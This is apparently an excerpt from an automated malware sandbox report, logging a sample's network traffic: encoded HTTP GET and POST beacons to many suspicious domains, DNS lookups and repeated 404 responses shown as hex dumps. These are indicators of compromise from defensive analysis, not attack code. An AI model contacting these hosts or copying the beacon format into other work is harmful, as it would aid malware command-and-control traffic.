        Source: global trafficHTTP traffic detected: GET /tcs6/?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.invicta.worldConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /bqye/?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.whats-in-the-box.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /was5/?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7k8f/?O4bP=9dRH6ZfHbJX&Xb3xI=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dfmagazine.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /txr6/?Xb3xI=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ngmr.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7cy1/?Xb3xI=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qjs8/?Xb3xI=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&O4bP=9dRH6ZfHbJX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.typ67.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /phvf/?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.greekhause.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficDNS traffic detected: DNS query: bestpack.ee
        Source: global trafficDNS traffic detected: DNS query: www.inastra.online
        Source: global trafficDNS traffic detected: DNS query: www.invicta.world
        Source: global trafficDNS traffic detected: DNS query: www.whats-in-the-box.org
        Source: global trafficDNS traffic detected: DNS query: www.linkwave.cloud
        Source: global trafficDNS traffic detected: DNS query: www.dfmagazine.shop
        Source: global trafficDNS traffic detected: DNS query: www.ngmr.xyz
        Source: global trafficDNS traffic detected: DNS query: www.albero-dveri.online
        Source: global trafficDNS traffic detected: DNS query: www.typ67.top
        Source: global trafficDNS traffic detected: DNS query: www.greekhause.org
        Source: global trafficDNS traffic detected: DNS query: www.dorikis.online
        Source: global trafficDNS traffic detected: DNS query: www.platinumkitchens.info
        Source: global trafficDNS traffic detected: DNS query: www.dhkatp.vip
        Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini01.click
        Source: global trafficDNS traffic detected: DNS query: www.komart.shop
        Source: global trafficDNS traffic detected: DNS query: www.dxeg.lol
        Source: global trafficDNS traffic detected: DNS query: www.tukaari.shop
        Source: unknownHTTP traffic detected: POST /tcs6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.invicta.worldOrigin: http://www.invicta.worldReferer: http://www.invicta.world/tcs6/Content-Length: 202Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 58 62 33 78 49 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 59 72 68 6a 6d 34 2b 75 44 55 64 34 57 77 75 36 45 71 67 57 4e 75 57 65 6e 52 70 6b 43 2b 47 43 4e 4d 79 6b 6b 68 49 4c 48 44 4e 36 30 39 54 6c 41 65 51 50 68 36 5a 69 59 67 53 4e 4a 30 6c 48 62 6c 5a 36 35 4a 74 65 35 48 53 71 42 41 55 31 39 62 30 6b 6e 58 6e 7a 72 2b 6f 78 73 6c 63 31 67 4e 6c 6b 35 79 74 33 47 72 6c 2b 72 4d 77 44 6c 33 4a 2b 70 4f 2b 6f 7a 37 33 67 74 78 41 2b 62 4c 2f 37 45 42 37 67 65 7a 30 6c 6d 38 4f 50 6e 35 2b 30 65 4c 72 77 61 76 62 36 38 62 38 50 6c 6d 56 51 52 4e 49 49 63 79 61 62 2b 69 4f 53 38 32 6a 52 73 67 3d 3d Data Ascii: Xb3xI=ZRDWWn0ISYUYYrhjm4+uDUd4Wwu6EqgWNuWenRpkC+GCNMykkhILHDN609TlAeQPh6ZiYgSNJ0lHblZ65Jte5HSqBAU19b0knXnzr+oxslc1gNlk5yt3Grl+rMwDl3J+pO+oz73gtxA+bL/7EB7gez0lm8OPn5+0eLrwavb68b8PlmVQRNIIcyab+iOS82jRsg==
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Wed, 25 Sep 2024 08:18:34 GMTX-Varnish: 1105030324Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Wed, 25 Sep 2024 08:18:36 GMTX-Varnish: 1105030335Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Wed, 25 Sep 2024 08:18:39 GMTX-Varnish: 1105030363Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Wed, 25 Sep 2024 08:18:42 GMTX-Varnish: 1105030372Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 07:56:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 07:56:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 07:56:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a 